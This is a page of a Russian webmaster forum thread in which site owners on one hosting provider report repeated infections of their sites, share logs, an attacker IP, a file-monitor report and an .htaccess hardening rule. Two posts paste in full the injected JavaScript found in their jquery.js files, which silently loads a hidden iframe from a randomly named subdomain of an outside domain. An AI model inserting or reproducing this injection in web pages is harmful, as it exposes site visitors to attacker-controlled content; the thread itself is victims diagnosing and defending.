Форум Сайтостроение Безопасность

Яндекс нашел вирус на сайте

1... 101112131415161718 ...41
Wolf - forest dog
На сайте с 06.05.2011
Offline
110
Wolf - forest dog
#131

Я так понял хостинг-провайдер "H O S T L * * *" никогда не признаёт своих ошибок. За три года, с которыми имел с ними дело, они ни разу не признали свою вину, даже в почти детских очевидностях, нагло внушали свою невиновную байду.

Не устарел ли хостобзор? Яндекс, Минусинск и реальность Hostpro.ua превратился в полный
J
На сайте с 30.07.2007
Offline
46
Jungle
#132

Сегодня Яндекс опять прислал письмо о заражении, захожу посмотреть, так теперь еще и права меняют:) Было 444 на .js файле, сменили на 755, ну и знакомый код в конце.

Осенью заканчивается проплаченный период, надо задуматься не сменить ли этих украинских хлопцев на другого хостера... так-то 3 года с ними, не хочется сразу уходить.

Зависть хакера? Лучше не работает или Вирус на сайте cms
[Удален]
#133

Вот официальный ответ, данный мне на вопрос по проблеме хостера с приложением логов...

Здравствуйте!

К сожалению мы не занимаемся поиском вредоносного кода. Рекомендуем Вам обратится к соответствующим специалистам веб-разработки.

Т.е. подтвердили, что за своими серверами не смотрят...

Больше всего убивает нежелание даже вникнуть в суть проблемы. Уже в интернете и лекарство есть.

Видимо я пошел искать нового хостера.

Все вопросы по бирже Логи сервера нужно просить Злоумышленники скопировали сайт.
C5
На сайте с 26.07.2012
Offline
32
cokol5
#134

тьфу тьфу тьфу около 2 недель пока все тихо на хостлайфе..по крайней мере у меня..

K
На сайте с 26.01.2013
Offline
5
konservator
#135

Подтверждаю, сегодня в 16:31 были изменены права на файл с 444 на 755,

с IP адреса: 65.19.138.34

;

var ifVcVajd = document.createElement('iframe');ifVcVajd.name = 'ifVcVajd';ifVcVajd.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'bazeratincomers.ru/';ifVcVajd.style.width = '0px';ifVcVajd.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifVcVajd=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifVcVajd);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); setTimeout(function() { document.cookie = 'ifVcVajd=yes; path=/; expires=' + expiresDate; }, 5000);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}

т.е. права теперь не спасают...

лог:

65.19.138.34 - - [03/Sep/2013:15:31:41 +0300] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 4742 "-" "Feedly/1.0 (+http://www.feedly.com/fetcher.html; like FeedFetcher-Google)"

Скрипт для автоматического импорта 69 полезных букмарклетов, о Четыре скрипта для управления
secline
На сайте с 25.10.2012
Offline
18
secline
#136

Ну что сказать, радовался я не долго, изменение прав с 644 на 444, и папок с 755 на 555, помогало только недели 3, сегодня изменился атрибут файла jquery.js с 444 на 755 и размер его.

Самое что интересное я создал в корне сайта своего файл sysmetvpn.php с размером 0, сегодня он удалился после внедрения кода в файл...

О чем мне с радостью поведал скрипт проверки файлов chfiles.

File: /home/user/domains/***/public_html/templates/theme/jquery.js

New filesize: 92551

Old filesize: 91671

New filetime: 03.09.2013 13:47

Old filetime: 14.12.2012 11:03

New file content..

CHMOD: -rwxr-xr-x

Deleted files:

/home/user/domains/***/public_html/sysmetvpn.php

Все на лицо. ;)

Вот мой:

var ifKiB9c = document.createElement('iframe');ifKiB9c.name = 'ifKiB9c';ifKiB9c.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'bazeratincomers.ru/';ifKiB9c.style.width = '0px';ifKiB9c.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifKiB9c=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifKiB9c);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); setTimeout(function() { document.cookie = 'ifKiB9c=yes; path=/; expires=' + expiresDate; }, 5000);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}
Оптимизация плавающих фреймов для 15 частых проблем технического Джоно Алдерсон на SearchLove
sdiev
На сайте с 06.07.2010
Offline
90
sdiev
#137

уже сутки сижу "чистым" ) добавил в папку со скриптами файл htaccess с содержанием: 

<Filesmatch ".(php)$">

order deny,allow

deny from all

</Filesmatch>

<Filesmatch "^index.php">

order allow,deny

allow from all

</Filesmatch>

<Filesmatch "^index2.php">

order deny,allow

allow from all

</Filesmatch>
secline
На сайте с 25.10.2012
Offline
18
secline
#138

Скажу больше ;)

Берем сервис http://2ip.ru/domain-list-by-ip/ вбиваем свой сайт, смотрим список из десятков сайтов, открываем штук 5 сайтов, и смотрим ихние файлы jquery.js

Открыл на угад сейчас 5 сайтов, в каждом из сайтов вирусный код...😂

---------- Добавлено 03.09.2013 в 18:46 ----------

Кто не верит смотрите сами, взламываются не только популярные движки...

Вот IP адрес 46.165.222.171, показало 24 сайта, проверьте и сами все увидите ;)

Там есть сайты казино, некоторые вообще самописные, и в них зловред!) Ну что тут ещё добавить?)

На 2 сайтах из списка вы не найдете зловреда, их я уже почистил.

P.S Позже если время найду отпишусь всем этим сайтам что у них вирус на сайте, и скину ссылку на эту тему.

Яндекс 360 обновил Почту Новая утилита для поиска SEO без защиты деньги
Wolf - forest dog
На сайте с 06.05.2011
Offline
110
Wolf - forest dog
#139

Посмотрите в поисковиках позиции своих сайтов расположенных на этом несчастном хосте и траффик проверьте. Походу поисковики решили опустить все сайты хостинга, его видать признали заразным для пользователей интернета, так как месячная эпопея с вирусами на сайтах на одних и тех же серверах не должна пройти незамеченной. За месяц поисковики не дождались лечения проблемы - значит все сайты на ИП-адресах больных серваков ниже плинтуса кинут

Ask.com открыл проект для Baidu и Yahoo! отметили Яндекс оповестит администраторов сайтов
77
На сайте с 27.08.2013
Offline
1
777Sharpey777
#140
volkovysk:
Посмотрите в поисковиках позиции своих сайтов расположенных на этом несчастном хосте и траффик проверьте. Походу поисковики решили опустить все сайты хостинга, его видать признали заразным для пользователей интернета, так как месячная эпопея с вирусами на сайтах на одних и тех же серверах не должна пройти незамеченной. За месяц поисковики не дождались лечения проблемы - значит все сайты на ИП-адресах больных серваков ниже плинтуса кинут

То же заметил, сайт очень низко опустился с 3к до 1к. Сегодня то же js с правами 444 был изменен на 755.

Подскажите пожалуйста нормальный хостинг для онлайн сайта. Нет сил больше мучится с ХостЗаразой.

Изменения порядка подтверждения прав Яндекс.Поиск для сайта переходит Как правильно сообщать в
1... 101112131415161718 ...41

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий